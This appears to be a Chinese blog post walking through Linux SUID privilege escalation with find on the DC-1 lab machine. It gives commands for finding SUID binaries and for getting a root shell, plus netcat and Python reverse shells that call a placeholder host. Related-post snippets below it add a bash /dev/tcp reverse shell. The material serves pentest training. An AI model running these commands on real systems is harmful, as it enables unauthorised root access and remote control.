suid提权

已于 2023-03-03 23:26:21 修改
阅读量299 收藏 2
点赞数
分类专栏: windows+linux提权 文章标签: web安全 Powered by 金山文档
于 2023-02-28 20:44:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129268196
版权

suid就是以root权限运行某个程序,类似于windows以管理员运行

本次靶机为vulnhub的dc-1

手工命令探测:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

通过此图可以看出存在suid提权,使用find

1.执行命令

touch 1
find -name 1 -exec whoami \;         #查找时需要找到这个文件
或
find . -exec whoami \;

2.反弹会话

find . -exec '/bin/sh' \;         #反弹本地
find . -exec netcat -lvp 5555 -e /bin/sh \; #使用nc 但是旧版本没有-e参数   
netcat xx.xx.xx.xx 5555
find . -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxxxxx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;#使用python
nc -lvp 7777
python ,nc语言反弹shell生成在下方链接

以下命令可能存在suid提权,其他命令不存在的原因是后面不能加参数,或者能加参数不能进行命令执行反弹shell

脚本探测 LinEnum,linuxprivchecker(python,注意可能需要一个个传文件,再就是打包成zip时可能目标主机无解压软件)

这两款都是用来测是否有suid等配置的脚本

liEnum:

linuxprivchecker

suid提权:
https://gtfobins.lo
https://pentestlab.blog/2017/suid-executables

反弹shell生成命令:

https://forum.ywhack.com/shell.php

在centos7,kali2022.1系统中,执行whoami都是root

find -name 1 -exec whoami \;

kali

centos

但是进入shell是下面的命令就不能成功执行,返回的shell不是root,提权失败,但是在有的系统中ubuntu中是可以成功提权,不知道为什么

find -name 1 -exec /bin/bash \;
id
或
find -name 1 -exec /bin/sh \;
id

kali

centos

ubuntun

下面的命令可以成功了

find -name 1 -exec /bin/bash -p \;
id

kali

centos

参考文章:

(18条消息) Linux下SUID提权方法_山山而川'的博客-CSDN博客

mushangqiujin
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux 权限提升--SUID
u012967763的专栏
01-09 3632
1、SUID 通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。由于SUID和SGID是在执行程序(程序的可执行位被设置)时起作用,而可执行位只对普通文件和目录文件有意义,所以设置其他种类文件的SUID和SGID位是没有多大意义的。一个文件设置了SUID那么该文件的属性中有s标志,如下所示。 [root@VM_0_11_centos ~]# chmod u+...
SUID提权
一只web狗
07-01 1万+
SUID提权介绍
find命令提权以及反弹shell复现
qq_40898302的博客
04-21 7829
关于linux系统的find命令提权复现
SUID提权原理、介绍以及演示
Nanyeer的博客
04-03 606
SUID提权原理、介绍以及简单演示
反弹shell通过普通用户进行SUID提权
sGanYu
07-18 1247
如果普通账号tom需要修改密码,就要访问/etc/shadow,由于/etc/passwd文件是所有用户都可读的,如果用户的密码太简单或规律比较明显的话,一台普通的计算机就能够很容易地将它破解,因此对安全性要求较高的Linux系统都把加密后的口令字分离出来,单独存放在一个文件中,这个文件是/etc/shadow文件,有超级用户才拥有该文件读权限,但是该文件只有root能访问。当tom需要修改密码,passwd程序的所有者为root,tom用户执行passwd程序的过程中会暂时获得root权限。...
Linux使用suid vim.basic文件实现提权
09-14
然而,SUID权限也可能被恶意利用,例如在提权攻击中。本篇文章将重点讨论如何通过SUID的`vim.basic`文件来实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`...
Linux提权手法总结以及 Linux提权exp集合
02-22
其次,SUID(Set-User-ID)程序提权是另一种常见的提权方式。SUID允许非特权用户以程序所有者的身份执行该程序,这在某些场景下是必要的,但也可能被恶意利用。例如,`passwd`、`sudo`等程序通常具有SUID权限,攻击...
Linux提权扫描脚本
最新发布
04-28
1. **确定目标**:明确要检测的提权漏洞类型,如SUID/SGID、权限配置错误等。 2. **编写检测代码**:根据目标漏洞编写相应的检测逻辑,如检查文件权限、进程属性等。 3. **漏洞验证**:编写验证代码,确保检测到的...
部分渗透提权文章
04-16
5. **提权实例**:在实际操作中,提权可能涉及多种技术,如利用SUID/SGID权限的程序,滥用sudo权限,或者通过系统服务漏洞进行提权。例如,CVE-2016-5195(Dirty COW)是一个著名的Linux内核漏洞,攻击者可以利用它...
linux中利用suid中的find进行root提权遇到的坑
rlenew的博客
12-28 2398
在Linux的提权方式中,有一种是根据suid进行提权suid特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行 其为文件赋予suid的命令是 chmod + s 文件 或者是 chmod 4755 文件 一般在获得一台Linux服务器的webshell后考虑提权,Linux下的方式多种多样,而这次主要是讲suid提权中遇到的坑。 find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f
简单的linux提权收集的N多linux内核exp
03-12
拿到shell了,准备提权.先看下linux内核 2.6.18-194.11.3.el5 内核 2010的,这个好CentOS release 5.5好提 然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢? 因为tmp目录可写可执行一般,继续ing. 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后我们进到/tmp目录 cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194 我这里有权限rwx,可读可写可执行.如果没有权限chmod -R 777 文件名 我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了 成功了 其实linux提权还是很简单,关键看有没exp
深度分析linux提权SUID提权|Find提权|NMAP提权|VIM提权...
qq_60115503的博客
05-07 2809
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限,SGID与SUID相似,只是执行程序时获得的是文件属组的权限
利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限
Fengg--Focus Oracle
06-29 7259
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限 RHEL5-RHEL6下面都可以实现,root的UID是零 创建一个普通用户 useradd andy 切换到andy用户 su - andy 查看当前用户是谁 whoami 查看tmp目录权限 [andy@bogon tmp]$ ll -d /tmp drwx
Linux利用Suid提权实验
qq_45813384的博客
02-20 1042
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
Linux被曝出SUDO提权漏洞,幸好影响不大
NOSEC2019的博客
10-15 2401
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root权限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
操作系统权限提升(十九)之Linux提权-SUID提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1792
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.命令执行者要对该程序文件拥有执行(x)权限.命令执行者在执行该程序时获得该程序文件属主的身份.
Linux下RHEL 5-6和CentOS 5-6漏洞提权
马赛克的博客
01-06 3199
来源:https://www.jianshu.com/p/595b4ac76467 作者:星期四晚八点 ———————————————————————————————————————————————————— 一:前言 提权就是让普通用户用户超级用户的权限。本次试验漏洞适用于RHEL 5-6和CentOS 5-6系列所有版本 主要利用/tmp/目录和/bin/ping命令进行的权限漏洞...
pingping6说起
热门推荐
Jack Zhou的专栏
01-20 1万+
1、Windows中的ping, ping6:发送ICMP ECHO_REQUEST到网络主机。ping6是ICMPv6版的ping实现。 -t:不停地ping指定的主机,要查看统计信息并继续ping,按Ctl+Break;要停止按Ctl+C。 -a:把地址解析成主机名(NetBios名)。
DAY28:Linux、Windows 系统提权
qq_49433473的博客
08-11 4777
Linux、Windows 系统提权、内核漏洞提权、脏牛提权(Dirty COW)、 SUID 提权,常用的可用于提权的程序`Nmap、Vim、find、Bash、More、Less、Nano、cp、awk` sudo提权、zip提权、计划任务提取、Linux明文root密码提权、利用 root 无密码执行...
curl 的suid 提权
09-13
对于 curl 的 suid 提权,我可以给你一些建议,但是请注意使用 suid 提权可能存在安全风险,需要谨慎操作。 Suid 权限是一种权限设置,允许普通用户在执行特定可执行文件时以文件所有者的权限运行它。这种设置通常用于提供普通用户对某些特权操作的临时访问权限。 要实现 curl 的 suid 提权,你可以按照以下步骤进行操作: 1. 创建一个新的 shell 脚本,比如 "curl_suid.sh"。 2. 在脚本中,设置需要执行的 curl 命令,比如 `#!/bin/sh \ncurl <your curl command>`。 3. 将该脚本的所有者设置为 root,并将 suid 位设置为可执行。可以使用以下命令进行设置: ``` $ sudo chown root:root curl_suid.sh $ sudo chmod 4755 curl_suid.sh ``` 请注意,这种设置可能会引起系统安全问题,因此建议你仔细评估风险并确保只有可信用户可以访问该脚本。 此外,还有其他提权方法和技术,但出于安全考虑,我无法提供更多细节。如果你需要更深入的了解,请查阅相关资料或咨询专业人士。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值